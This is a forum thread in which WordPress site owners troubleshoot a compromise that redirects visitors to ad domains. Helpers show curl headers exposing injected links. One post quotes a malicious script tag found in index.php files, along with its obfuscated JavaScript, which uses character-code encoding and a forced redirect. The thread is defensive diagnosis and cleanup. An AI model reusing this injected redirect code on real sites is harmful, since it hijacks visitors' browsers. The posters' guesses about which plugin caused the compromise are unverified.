My wordress site start redirecting to sites containing ads

Hi I transfered my domaine (almaali.org) to cloudflare and right after that the site start acting like if the domain expired.
it refered to “https://0.directednotconverted.ml/?p=gfqtqojrmu5gi3bpgiydknq&sub1=folons&sub2=tommy.buy

Hi @medhallal,

Your site is redirecting, but this doesn’t look like it is caused by Cloudflare.

$ curl -I https://almaali.org
HTTP/2 200 
date: Thu, 03 Sep 2020 09:48:08 GMT
content-type: text/html; charset=UTF-8
set-cookie: __cfduid=d5417866c5883898c48977b4d894da5b81599126488; expires=Sat, 03-Oct-20 09:48:08 GMT; path=/; domain=.almaali.org; HttpOnly; SameSite=Lax; Secure
x-powered-by: PHP/7.2.32
link: <https://go.donatelloflowfirstly.ga/go.php?0=0/wp-json/>; rel="https://api.w.org/"
link: <https://go.donatelloflowfirstly.ga/go.php?0=0/>; rel=shortlink
x-litespeed-cache-control: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
cf-request-id: 04f4f6def800000639bc377200000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 5cce8dab2aff0639-LHR

You may want to scan your server if this behaviour is unexpected.

2 Likes

Thanks a lot, I found this code added by a plugin to all “index.php” files
<script type='text/javascript' src='https://scripts.lowerbeforwarden.ml/src.js?n=nb5'></script>
His content:
window.stop();
var v=String.fromCharCode(104,116,116,112,115,58,47,47,115,111,117,114,99,101,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,46,104,116,109,108,63,116,114,61,52,55,51,38,118,119,61,49,50);
window.location.replace(v);
document.location.href=v;
So the problem resolved after deleting the code.

how do you delete this code my site is also doing the same thing now

hi i need help with this same issue but don’t know where to find the code to delete

Hi, if you know how to code, and how to edit your database content, and you are using Wordpress. you can follow this steps:
(else you can ask for my fb account and I’ll help you with it)

  1. Download a backup from your site’s hosting.
  2. Open the root (main) folder using a code editor (Ex: note ++)
  3. Open an “index.php” file (Ex: /wp-content/plugins/index.php) and you will find a code like <script type='text/javascript' src='*link*'></script>
  4. copy the link you found
  5. Seach in all files for the link you already copied, and open all the files in the results
  6. Then delete the “added” code.
  7. Then you must search in your database for the same link and delete it.

I have same problem. Do you know which plugin caused this?

I don’t, but I guess it is caused by “hacked” premium plugins. So you need to fix this right after deleting the folder of all “hacked” plugins you downloaded.

It is because of the “WP File Manager” plugin. You can see it’s reviews, many people are complaining.

1 Like